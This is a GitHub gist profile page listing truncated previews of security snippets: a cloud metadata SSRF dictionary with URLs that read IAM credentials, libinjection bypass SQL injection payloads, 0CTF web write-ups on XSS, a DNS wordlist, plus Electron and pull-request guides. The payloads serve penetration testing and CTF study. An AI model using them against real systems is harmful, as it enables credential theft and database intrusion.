Skip to content

Instantly share code, notes, and snippets.

View qazbnm456's full-sized avatar
:electron:
Focusing

Syue Siang Su qazbnm456

:electron:
Focusing
1k followers · 20 following
View GitHub Profile
@qazbnm456
qazbnm456 / lp6-aspnet-viewstate.linq
Created April 30, 2020 03:12
Source: https://github.com/sdcb/blog-data/tree/master/2020/20200222-machinekey-in-dotnetcore
<Query Kind="Program">
<Namespace>Microsoft.AspNetCore.WebUtilities</Namespace>
<Namespace>System.IO.Compression</Namespace>
<Namespace>System.Security.Cryptography</Namespace>
<AppConfig>
<Content>
<configuration>
<runtime>
<loadFromRemoteSources enabled="true" />
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
@qazbnm456
qazbnm456 / cloud_metadata.txt
Created April 25, 2018 08:07 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@qazbnm456
qazbnm456 / 0ctf_2018_quals_writeups.md
Created April 4, 2018 09:42 — forked from paul-axe/0ctf_2018_quals_writeups.md
0ctf_2018_quals_writeups

h4x0rs.club 2

Application was built from 2 parts - frontend page (https://h4x0rs.club/game/) and backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:

  1. Stored XSS on user profile page.

It's also possible to make victim browser trigger a click on injected element

if(location.hash.slice(1) == 'report'){
            document.getElementById('report-btn').click();
@qazbnm456
qazbnm456 / 0ctf_h4x0rs.space.md
Created April 3, 2018 16:41 — forked from masatokinugawa/0ctf_h4x0rs.space.md
0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)

0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)

問題

I've made a blog platform let you write your secret. 
Nobody can know it since I enabled all of modern web security mechanism, is it cool, huh?

Get `document. cookie` of the admin.

h4x0rs.space
@qazbnm456
qazbnm456 / libinjection-bypasses.txt
Created March 18, 2018 14:02 — forked from migolovanov/libinjection-bypasses.txt
&()o1: select * from users where id=1 or (\)=1 union select 1,@@VERSION -- 1
&(.)o: select * from users where id=1 or (\.)=1 union select 1,@@VERSION -- 1
&(1&1: select * from users where id=1 or (\+)=1 or 1=1 -- 1
&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1
&(1UE: select * from users where id=1 or (\+)=1 union select 1,@@VERSION -- 1
&(n&1: select * from users where id=1 or ($+)=1 or 1=1 -- 1
&(nUE: select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1
&.o&1: select * from users where id=1 or \.<\ or 1=1 -- 1
&.o1&: select * from users where id=1 or \.<1 or 1=1 -- 1
&.o1U: select * from users where id=1 or \.<1 union select 1,@@VERSION -- 1
@qazbnm456
qazbnm456 / all.txt
Created March 16, 2018 16:59 — forked from jhaddix/all.txt
dnsall
This file has been truncated, but you can view the full file.
@
*
0
00
0-0
000
0000
00000
@qazbnm456
qazbnm456 / Electron 入門.md
Created September 15, 2017 08:44 — forked from umamichi/Electron 入門.md
Electron 入門
@qazbnm456
qazbnm456 / gist:bbccbcd7ad4b5e33dac14223d468e89c
Created May 28, 2016 03:45 — forked from timdream/gist:5968469
Github 發 Pull Request & 貢獻流程速查

Github 發 Pull Request & 貢獻流程速查

前言

此文目標讀者需先自行學會

  • 開 Github 帳號
  • 會 fork 程式 repository
  • 會在自己的電腦使用命令列 git
  • 會 clone 自己的 repository